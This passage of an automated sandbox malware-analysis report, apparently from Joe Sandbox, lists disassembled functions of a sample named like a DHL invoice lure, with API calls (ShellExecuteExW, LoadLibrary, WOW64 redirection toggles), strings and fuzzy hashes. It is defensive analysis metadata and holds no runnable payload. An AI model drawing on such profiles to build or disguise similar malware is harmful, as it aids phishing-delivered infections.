                                                                                                                        • Instruction Fuzzy Hash: FE919B74A04208AFCB16EF54C891DEDBBB5EF85348F10805DF906AF692DB71AE41CB50
                                                                                                                        Function 003BAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 003BAEA3
                                                                                                                          • Part of subcall function 00337620: _wcslen.LIBCMT ref: 00337625
                                                                                                                        • GetProcessId.KERNEL32(00000000), ref: 003BAF38
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003BAF67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                        • String ID: <$@
                                                                                                                        • API String ID: 146682121-1426351568
                                                                                                                        • Opcode ID: 8309eef7004ac458beea377ef64abd1744776ce0cbf8772cb5a6ad4d9debad32
                                                                                                                        • Instruction ID: e3abea7474b37f7092d13c6a801548e2f7d3db620e35da19ac93007b685e908c
                                                                                                                        • Opcode Fuzzy Hash: 8309eef7004ac458beea377ef64abd1744776ce0cbf8772cb5a6ad4d9debad32
                                                                                                                        • Instruction Fuzzy Hash: 0D717775A00A18DFCB16DF54C484A9EBBF0BF08314F058499E856AF7A2CB74ED41CB91
                                                                                                                        Function 003C6278 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(00E8E8F0,?), ref: 003C62E2
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 003C6315
                                                                                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 003C6382
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 3880355969-2513823414
                                                                                                                        • Opcode ID: a6c4caa13c92188a6ac2ad0df4a0ee7f031a9f50a77a94f12447b201b0524d0a
                                                                                                                        • Instruction ID: 4f229f8bb5c3152e83d1f8d0a09c0df0e7c9880e91dd02abd3c4c9fe36d8b9bf
                                                                                                                        • Opcode Fuzzy Hash: a6c4caa13c92188a6ac2ad0df4a0ee7f031a9f50a77a94f12447b201b0524d0a
                                                                                                                        • Instruction Fuzzy Hash: EA512874A00249AFCB12DF68D981EAE7BB5EB85360F11816DF815DB2A1D730ED81CB50
                                                                                                                        Function 0039719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00397206
                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0039723C
                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0039724D
                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003972CF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                        • String ID: DllGetClassObject
                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                        • Opcode ID: 2c27b52494a5ed717e6b523666422b7824c136e56eda254bbad4d92d756a7fde
                                                                                                                        • Instruction ID: aef1fbe1eb146554f81be2a67f22ce51ac65557b8bff15777f6c4f31df5ed0a4
                                                                                                                        • Opcode Fuzzy Hash: 2c27b52494a5ed717e6b523666422b7824c136e56eda254bbad4d92d756a7fde
                                                                                                                        • Instruction Fuzzy Hash: 31418E72624204EFDF16CF54C884A9A7BA9EF44710F2584A9FD09DF28AD7B1DD40CBA0
                                                                                                                        Function 0039C27D Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 114windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0039C306
                                                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 0039C34C
                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00401990,(V), ref: 0039C395
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Delete$InfoItem
                                                                                                                        • String ID: (V$0
                                                                                                                        • API String ID: 135850232-1321988580
                                                                                                                        • Opcode ID: b7d854bce3bead105c4f2876946c0bf6eeff0ed16475dd4e220befff1665423e
                                                                                                                        • Instruction ID: b4012bb34a01f058eeb0d8979df098bbfc3d38313656e41eb7db57a7f4f4cdd0
                                                                                                                        • Opcode Fuzzy Hash: b7d854bce3bead105c4f2876946c0bf6eeff0ed16475dd4e220befff1665423e
                                                                                                                        • Instruction Fuzzy Hash: 8041B0752143019FDB22DF29D884F5ABBE8AF85320F019A1DF8A59B2D1D774E904CB52
                                                                                                                        Function 003C52C1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 003C5352
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003C5375
                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003C5382
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003C53A8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 3340791633-2513823414
                                                                                                                        • Opcode ID: 1380f4b4a5e77297b758dc1273bbfa58cf2a940b40f424be2b8ce9778ad232e3
                                                                                                                        • Instruction ID: 74c20a7524c8d86ffe04e95534d223d750b770a8b269ad625a114295bc856d78
                                                                                                                        • Opcode Fuzzy Hash: 1380f4b4a5e77297b758dc1273bbfa58cf2a940b40f424be2b8ce9778ad232e3
                                                                                                                        • Instruction Fuzzy Hash: 7931B038B55A88AFEB339E14CC45FE87769AB04390F59410AFA11D62E1C7B0BDC09B41
                                                                                                                        Function 003C7674 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 003C769A
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 003C7710
                                                                                                                        • PtInRect.USER32(?,?,003C8B89), ref: 003C7720
                                                                                                                        • MessageBeep.USER32(00000000), ref: 003C778C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 1352109105-2513823414
                                                                                                                        • Opcode ID: 1ebf09134b8824c71b61af82156d8b4c9a27177ecb459c872a80b97b1b0bf641
                                                                                                                        • Instruction ID: 8853ca371687360ea9dc42a61dea68c52461c0ef7ca459e99e6d3437f1286628
                                                                                                                        • Opcode Fuzzy Hash: 1ebf09134b8824c71b61af82156d8b4c9a27177ecb459c872a80b97b1b0bf641
                                                                                                                        • Instruction Fuzzy Hash: A2417875A092189FCB12DF68C994FA9B7F5BB49354F1A80ACE814EB261C730ED41CF90
                                                                                                                        Function 003C4653 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 87windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003C4705
                                                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003C4713
                                                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003C471A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                                                        • String ID: msctls_updown32$xV
                                                                                                                        • API String ID: 4014797782-1842320223
                                                                                                                        • Opcode ID: 4950e1c918ff542e62966665ed615328c31da3d3713dd059de3cc1d48875d5fc
                                                                                                                        • Instruction ID: cfc68169a0acc532e8b678aa393162e86cd34f2a90ae0598d3fb2a8b6029c534
                                                                                                                        • Opcode Fuzzy Hash: 4950e1c918ff542e62966665ed615328c31da3d3713dd059de3cc1d48875d5fc
                                                                                                                        • Instruction Fuzzy Hash: E0213CB5600209AFDB12DF64DCD1EA737ADEB5A3A4B050059FA14DB361CB71EC61CB60
                                                                                                                        Function 003C2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003C2F8D
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 003C2F94
                                                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003C2FA9
                                                                                                                        • DestroyWindow.USER32(?), ref: 003C2FB1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                        • String ID: SysAnimate32
                                                                                                                        • API String ID: 3529120543-1011021900
                                                                                                                        • Opcode ID: e74fb0f2eea6cd0bd91886870837b1d529cbe2079a6027dc37d0822608d5402e
                                                                                                                        • Instruction ID: 79338a4c1d4d0a03ca501d166e3cafc585f22e994e2b3670428ced915eb555c7
                                                                                                                        • Opcode Fuzzy Hash: e74fb0f2eea6cd0bd91886870837b1d529cbe2079a6027dc37d0822608d5402e
                                                                                                                        • Instruction Fuzzy Hash: 1E21AC72204209ABEB228F64DC80FBB77BDEB59364F12562CFA50D61A0DB71EC519760
                                                                                                                        Function 003C8FC9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                                                                                                                        • GetCursorPos.USER32(?), ref: 003C9001
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00387711,?,?,?,?,?), ref: 003C9016
                                                                                                                        • GetCursorPos.USER32(?), ref: 003C905E
                                                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00387711,?,?,?), ref: 003C9094
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 2864067406-2513823414
                                                                                                                        • Opcode ID: 7d0cd54aade6ab70e29e88b7663b265cc0d3c2dc00d5de8daee5f15982484d8a
                                                                                                                        • Instruction ID: e47351993fde7330da3ce92135e4dbd8e26b6a6fc3ae653566620ce078e35e70
                                                                                                                        • Opcode Fuzzy Hash: 7d0cd54aade6ab70e29e88b7663b265cc0d3c2dc00d5de8daee5f15982484d8a
                                                                                                                        • Instruction Fuzzy Hash: 1A218336600028EFDB168F95CC58FFA7BB9EF49350F1540AAF5059B261C731AD50DB60
                                                                                                                        Function 00354D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00354D1E,003628E9,?,00354CBE,003628E9,003F88B8,0000000C,00354E15,003628E9,00000002), ref: 00354D8D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00354DA0
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00354D1E,003628E9,?,00354CBE,003628E9,003F88B8,0000000C,00354E15,003628E9,00000002,00000000), ref: 00354DC3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                        • Opcode ID: 18badcfbdbb59c4b08fb18e3ea1d0ed0597a0c58453d05eba831195b68eeda5a
                                                                                                                        • Instruction ID: a0c4dd18dcbdfefaca2e9603b6fbe6e90d87aa5378a33bdc364f7aeb5aa1416c
                                                                                                                        • Opcode Fuzzy Hash: 18badcfbdbb59c4b08fb18e3ea1d0ed0597a0c58453d05eba831195b68eeda5a
                                                                                                                        • Instruction Fuzzy Hash: 98F08C35A50208ABDB169B90DC49FEEBBF8EF04712F0400A4EC09A6260CB30A984CB90
                                                                                                                        Function 0038D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32 ref: 0038D3AD
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0038D3BF
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0038D3E5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                        • API String ID: 145871493-2590602151
                                                                                                                        • Opcode ID: d6acae019a3340cd75dd6769bd02aab0e1291a39984b301b319b2415d4d2f961
                                                                                                                        • Instruction ID: 1e14141e35c353131c87f7ee00333b0ffb3ef425a40f1e48751b672d4583e496
                                                                                                                        • Opcode Fuzzy Hash: d6acae019a3340cd75dd6769bd02aab0e1291a39984b301b319b2415d4d2f961
                                                                                                                        • Instruction Fuzzy Hash: 01F05538845B20ABD73337108C08E69B31CAF00701F5A95D9F80BE20C4CB70DD408782
                                                                                                                        Function 00334E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00334EDD,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E9C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00334EAE
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00334EDD,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334EC0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                        • API String ID: 145871493-3689287502
                                                                                                                        • Opcode ID: 9530a494dd06db302388d4db297f4f2c9dfa072993239416aefb4e1241afeb3b
                                                                                                                        • Instruction ID: f1e1ab08cea6cf18bc1318c59ea0a06f77c1559a543eb241ccc7b4da194c8678
                                                                                                                        • Opcode Fuzzy Hash: 9530a494dd06db302388d4db297f4f2c9dfa072993239416aefb4e1241afeb3b
                                                                                                                        • Instruction Fuzzy Hash: 8DE0CD35E125225BD23317266C18F6FA55CAFC1F62F0A0115FD09D2210DB60ED0242A0
                                                                                                                        Function 00334E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00373CDE,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E62
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00334E74
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00373CDE,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E87
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                        • API String ID: 145871493-1355242751
                                                                                                                        • Opcode ID: a80fbf3c80e5c8c445e28e10fd4edfd8fc83d4298ee56ce2030e8d42db0f48a6
                                                                                                                        • Instruction ID: bdcf479038da21fac66f2d4b2ac29d7d3b3e368edfec3395e219c6b12f0ad368
                                                                                                                        • Opcode Fuzzy Hash: a80fbf3c80e5c8c445e28e10fd4edfd8fc83d4298ee56ce2030e8d42db0f48a6
                                                                                                                        • Instruction Fuzzy Hash: 87D05B369126315756331B66BC1CEDF6A1CAF85F52B0A1515F90DE2114CF60ED02C7D0
                                                                                                                        Function 003BA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 003BA427
                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003BA435
                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003BA468
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 003BA63D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseCountersCurrentHandleOpen
